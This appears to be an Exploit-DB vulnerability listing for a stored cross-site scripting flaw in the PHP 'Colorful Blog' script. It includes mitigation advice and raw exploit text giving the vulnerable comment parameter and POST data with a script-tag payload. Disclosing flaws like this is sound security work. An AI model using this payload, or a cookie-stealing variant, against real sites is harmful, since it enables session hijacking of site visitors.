Colorful Blog - Stored Cross Site Scripting

vendor:

Colorful Blog

by:

Besim

8,8

CVSS

HIGH

Stored Cross Site Scripting

CWE

Product Name: Colorful Blog

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: PHP

2016

Colorful Blog – Stored Cross Site Scripting

A stored XSS vulnerability exists in Colorful Blog, which allows an attacker to inject malicious JavaScript code into the 'adsoyad' parameter of the 'single.php' page. By sending a crafted POST request with the malicious payload, an attacker can execute arbitrary JavaScript code in the victim's browser.

Mitigation:

Input validation should be used to prevent malicious code from being stored in the application. Additionally, the application should use a whitelist of accepted characters and reject any input that contains characters outside of the whitelist.

Source

Exploit-DB raw data:

# Exploit Title : ----------- : Colorful Blog - Stored Cross Site Scripting
# Author : -----------------  : Besim
# Google Dork : ---------  :    -
# Date : -------------------- : 13/10/2016
# Type : -------------------- : webapps
# Platform : --------------- : PHP  
# Vendor Homepage :-- : -
# Software link : --------- : http://wmscripti.com/php-scriptler/colorful-blog-scripti.html


Description : 

# Vulnerable link : http://site_name/path/single.php?kat=kat&url='post_name'

*-*-*-*-*-*-*-*-* Stored XSS Payload *-*-*-*-*-*-*-*-* 

*-* Vulnerable URL : http://site_name/path/single.php?kat=kat&url='post_name'    ---   Post comment section
*-* Vuln. Parameter : adsoyad
*-* POST DATA        :  adsoyad=<script>alert('document.cookie')</script>&email=besim@yopmail.com&web=example.com&mesaj=Nice, blog post